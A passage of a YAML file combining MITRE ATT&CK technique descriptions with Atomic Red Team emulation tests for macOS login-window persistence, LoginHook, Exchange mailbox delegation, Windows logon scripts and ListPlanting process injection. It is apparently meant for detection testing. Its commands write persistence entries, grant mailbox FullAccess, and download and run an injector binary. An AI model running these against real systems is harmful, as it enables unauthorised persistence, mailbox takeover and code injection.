url: https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.375Z'
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
description: |-
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.2'
identifier: T1547.007
atomic_tests:
- name: Copy in loginwindow.plist for Re-Opened Applications
auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba
description: 'Copy in new loginwindow.plist to launch Calculator.
'
supported_platforms:
- macos
input_arguments:
calc_plist_path:
description: path to binary plist with entry to open calculator
type: path
default: PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist
executor:
command: 'cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
'
cleanup_command: 'rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
'
name: sh
- name: Re-Opened Applications using LoginHook
auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb
description: |
Mac Defaults
[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
supported_platforms:
- macos
input_arguments:
script:
description: path to script
type: path
default: "/path/to/script"
executor:
command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
'
cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
'
elevation_required: true
name: sh
- name: Append to existing loginwindow for Re-Opened Applications
auto_generated_guid: 766b6c3c-9353-4033-8b7e-38b309fa3a93
description: |
Appends an entry to launch Calculator hidden loginwindow.*.plist for next login.
Note that the change may not result in the added Calculator program launching on next user login.
It may depend on which version of macOS you are running on.
supported_platforms:
- macos
input_arguments:
objc_source_path:
description: path to objective C program
type: path
default: PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m
exe_path:
description: path to compiled program
type: path
default: "/tmp/t1547007_append_exe"
dependency_executor_name: bash
dependencies:
- description: 'compile C program
'
prereq_command: 'if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
'
get_prereq_command: 'cc #{objc_source_path} -o #{exe_path} -framework Cocoa
'
executor:
command: |
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
cleanup_command: |
rm -f #{exe_path}
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then
exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}
name: sh
T1098.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306
created: '2020-01-19T16:54:28.516Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/002
external_id: T1098.002
- source_name: Bienstock, D. - Defending O365 - 2019
description: 'Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending
O365. Retrieved November 17, 2024.'
url: https://www.slideshare.net/slideshow/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365/128744511
- source_name: Crowdstrike Hiding in Plain Sight 2018
description: 'Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the
Office 365 Activities API to Investigate Business Email Compromises. Retrieved
January 19, 2020.'
url: https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/
- source_name: Google Ensuring Your Information is Safe
description: Google. (2011, June 1). Ensuring your information is safe online.
Retrieved April 1, 2022.
url: https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html
- source_name: Gmail Delegation
description: Google. (n.d.). Turn Gmail delegation on or off. Retrieved April
1, 2022.
url: https://support.google.com/a/answer/7223765?hl=en
- source_name: FireEye APT35 2018
description: Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November
17, 2024.
url: https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf
- source_name: Mandiant Defend UNC2452 White Paper
description: Mandiant. (2021, January 19). Remediation and Hardening Strategies
for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.
url: https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452
- source_name: Microsoft - Add-MailboxPermission
description: Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September
13, 2019.
url: https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.801Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlet, available in on-premises Exchange and in the cloud-based service Office
365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation:
FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google
Workspace, delegation can be enabled via the Google Admin console and users
can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation:
Google Ensuring Your Information is Safe) \n\nAdversaries may also assign
mailbox folder permissions through individual folder permissions or roles.
In Office 365 environments, adversaries may assign the Default or Anonymous
user permissions or roles to the Top of Information Store (root), Inbox, or
other mailbox folders. By assigning one or both user permissions to a folder,
the adversary can utilize any other account in the tenant to maintain persistence
to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White
Paper)\n\nThis may be used in persistent threat incidents as well as BEC (Business
Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)
to the accounts they wish to compromise. This may further enable use of additional
techniques for gaining access to systems. For example, compromised business
accounts are often used to send messages to other accounts in the network
of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)),
so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock,
D. - Defending O365 - 2019)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
- Nilesh Dherange (Gurucul)
- Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Office Suite
x_mitre_version: '2.2'
identifier: T1098.002
atomic_tests:
- name: EXO - Full access mailbox permission granted to a user
auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
description: |
Give a nominated user, full mailbox delegation access of another user.
This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default: o365_user_test@contoso.com
password:
description: office-365 password
type: string
default: o365_password_test
delegate_target:
description: office-365 target_email
type: string
default: delegate@contoso.com
operator_mailbox:
description: office-365 target_email
type: string
default: operator@contoso.com
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
'
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: "Install-Module -Name ExchangeOnlineManagement \n"
executor:
command: |
Import-Module ExchangeOnlineManagement
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
Disconnect-ExchangeOnline -Confirm:$false
cleanup_command: |
Import-Module ExchangeOnlineManagement
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
Disconnect-ExchangeOnline -Confirm:$false
name: powershell
elevation_required: false
T1548.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb
created: '2024-03-21T21:10:57.322Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/006
external_id: T1548.006
- source_name: welivesecurity TCC
description: 'Marc-Etienne M.Léveillé. (2022, July 19). I see what you did
there: A look at the CloudMensis macOS spyware. Retrieved March 21, 2024.'
url: https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
- source_name: TCC Database
description: 'Marina Liang. (2024, April 23). Return of the mac(OS): Transparency,
Consent, and Control (TCC) Database Manipulation. Retrieved March 28, 2024.'
url: https://interpressecurity.com/resources/return-of-the-macos-tcc/
- source_name: TCC macOS bypass
description: Phil Stokes. (2021, July 1). Bypassing macOS TCC User Privacy
Protections By Accident and Design. Retrieved March 21, 2024.
url: https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T23:14:58.393Z'
name: TCC Manipulation
description: |+
Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Marina Liang
- Wojciech Reguła @_r3ggi
- Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1055.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f
created: '2020-01-14T01:33:19.065Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/008
external_id: T1055.008
- source_name: PTRACE man
description: Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's
Manual. Retrieved February 21, 2020.
url: http://man7.org/linux/man-pages/man2/ptrace.2.html
- source_name: Medium Ptrace JUL 2018
description: Jain, S. (2018, July 25). Code injection in running process using
ptrace. Retrieved February 21, 2020.
url: https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be
- source_name: BH Linux Inject
description: Colgan, T. (2015, August 15). Linux-Inject. Retrieved February
21, 2020.
url: https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf
- source_name: ArtOfMemoryForensics
description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
- source_name: GNU Acct
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
url: https://www.gnu.org/software/acct/
- source_name: RHEL auditd
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: Chokepoint preload rootkits
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.344Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
as possibly elevate privileges. Ptrace system call injection is a method of
executing arbitrary code in the address space of a separate live process.
\n\nPtrace system call injection involves attaching to and modifying a running
process. The ptrace system call enables a debugging process to observe and
control another process (and each individual thread), including changing memory
and register values.(Citation: PTRACE man) Ptrace system call injection is
commonly performed by writing arbitrary code into a running process (ex: malloc)
then invoking that memory with PTRACE_SETREGS to set the register
containing the next instruction to execute. Ptrace system call injection can
also be done with PTRACE_POKETEXT/PTRACE_POKEDATA,
which copy data to a specific address in the target processes’ memory (ex:
the current address of the next instruction). (Citation: PTRACE man)(Citation:
Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible
targeting processes that are non-child processes and/or have higher-privileges.(Citation:
BH Linux Inject) \n\nRunning code in the context of another process may allow
access to the process's memory, system/network resources, and possibly elevated
privileges. Execution via ptrace system call injection may also evade detection
from security products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1037.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3
created: '2020-01-10T03:43:37.211Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037/001
external_id: T1037.001
- source_name: Hexacorn Logon Scripts
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
- source_name: TechNet Logon Scripts
description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved
April 27, 2016.
url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.610Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
to be run whenever a specific user or group of users log into a system.(Citation:
TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript
Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these
scripts to maintain persistence on a single system. Depending on the access
configuration of the logon scripts, either local credentials or an administrator
account may be necessary. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231
description: |
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
supported_platforms:
- windows
input_arguments:
script_path:
description: Path to .bat file
type: string
default: "%temp%\\art.bat"
script_command:
description: Command To Execute
type: string
default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt
executor:
command: |
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
cleanup_command: |
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
del #{script_path} >nul 2>&1
del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
name: command_prompt
T1055.015:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
created: '2021-11-22T15:02:15.190Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/015
external_id: T1055.015
- source_name: Hexacorn Listplanting
description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
trick. Retrieved August 14, 2024.
url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
- source_name: ESET InvisiMole June 2020
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- source_name: Microsoft List View Controls
description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
January 4, 2022.
url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- source_name: Modexp Windows Process Injection
description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
Retrieved November 15, 2021.'
url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.701Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
Code executed via ListPlanting may also evade detection from security products
since the execution is masked under a legitimate process.\n\nList-view controls
are user interface windows used to display collections of items.(Citation:
Microsoft List View Controls) Information about an application's list-view
settings are stored within the process' memory in a SysListView32
control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
be performed by copying code into the virtual address space of a process that
uses a list-view control then using that code as a custom callback for sorting
the listed items.(Citation: Modexp Windows Process Injection) Adversaries
must first copy code into the target process’ memory space, which can be performed
various ways including by directly obtaining a handle to the SysListView32
child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
of the highly monitored WriteProcessMemory function. For example,
an adversary can use the PostMessage and/or SendMessage
API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION
messages, effectively copying a payload 2 bytes at a time to the allocated
memory.(Citation: ESET InvisiMole June 2020) \n\nFinally, the payload is triggered
by sending the LVM_SORTITEMS message to the SysListView32
child of the process window, with the payload within the newly allocated buffer
passed and executed as the ListView_SortItems callback."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- ESET
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1055.015
atomic_tests:
- name: Process injection ListPlanting
auto_generated_guid: 4f3c7502-b111-4dfe-8a6e-529307891a59
description: This test injects shellcode into a remote RegEdit process using
the ListPlanting technique. ListPlanting exploits Window with ListView control.
Code write to memory with NtWriteVirtualMemory. The shellcode is executed
via PostMessage. When successful, a message box will appear with the title
"Warning" and the content "Atomic Red Team" after a few seconds. Notepad will
open following the appearance of the message box.
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1055.015\bin\ListPlanting.exe
dependency_executor_name: powershell
dependencies:
- description: 'Injector ListPlanting.exe must exist at specified location (#{exe_binary})
'
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.015/bin/ListPlanting.exe" -OutFile "#{exe_binary}"
executor:
command: |-
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
T1484:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d
created: '2019-03-07T14:10:32.650Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484
external_id: T1484
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a
- source_name: ADSecurity GPO Persistence 2016
description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence
#17: Group Policy. Retrieved March 5, 2019.'
url: https://adsecurity.org/?p=2716
- source_name: Microsoft 365 Defender Solorigate
description: Microsoft 365 Defender Team. (2020, December 28). Using Microsoft
365 Defender to protect against Solorigate. Retrieved January 7, 2021.
url: https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/
- source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods
description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved
December 30, 2020.
url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
- source_name: Microsoft - Update or Repair Federated domain
description: Microsoft. (2020, September 14). Update or repair the settings
of a federated domain in Office 365, Azure, or Intune. Retrieved December
30, 2020.
url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365
- source_name: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 30, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
- source_name: Okta Cross-Tenant Impersonation 2023
description: 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant
Impersonation: Prevention and Detection. Retrieved February 15, 2024.'
url: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
- source_name: Wald0 Guide to GPOs
description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and
OUs. Retrieved March 5, 2019.
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
September 23, 2024.
url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved November 17, 2024.
url: https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.897Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
managed environments. Such services provide a centralized means of managing
identity resources such as devices and accounts, and often include configuration
settings that may apply between domains or tenants such as trust relationships,
identity syncing, or identity federation.\n\nModifications to domain or tenant
settings may include altering domain Group Policy Objects (GPOs) in Microsoft
Active Directory (AD) or changing trust settings for domains, including federation
trusts relationships between domains or tenants.\n\nWith sufficient permissions,
adversaries can modify domain or tenant policy settings. Since configuration
settings for these services apply to a large number of identity resources,
there are a great number of potential attacks malicious outcomes that can
stem from this abuse. Examples of such abuse include: \n\n* modifying GPOs
to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)
to computers throughout the domain environment(Citation: ADSecurity GPO Persistence
2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n*
modifying domain trusts to include an adversary-controlled domain, allowing
adversaries to forge access tokens that will subsequently be accepted by
victim domain resources(Citation: Microsoft - Customer Guidance on Recent
Nation-State Cyber Attacks)\n* changing configuration settings within the
AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n*
adding new, adversary-controlled federated identity providers to identity
tenants, allowing adversaries to authenticate as any user managed by the victim
tenant (Citation: Okta Cross-Tenant Impersonation 2023)\n\nAdversaries may
temporarily modify domain or tenant policy, carry out a malicious action(s),
and then revert the change to remove suspicious indicators."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Obsidian Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Identity Provider
x_mitre_version: '3.2'
atomic_tests: []
T1547.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
created: '2020-01-24T18:38:55.801Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/008
external_id: T1547.008
- source_name: Microsoft LSA Protection Mar 2014
description: Microsoft. (2014, March 12). Configuring Additional LSA Protection.
Retrieved November 27, 2017.
url: https://technet.microsoft.com/library/dn408187.aspx
- source_name: Microsoft DLL Security
description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November
27, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx
- source_name: Microsoft Security Subsystem
description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved
November 27, 2017.
url: https://technet.microsoft.com/library/cc961760.aspx
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.318Z'
name: 'Boot or Logon Autostart Execution: LSASS Driver'
description: |-
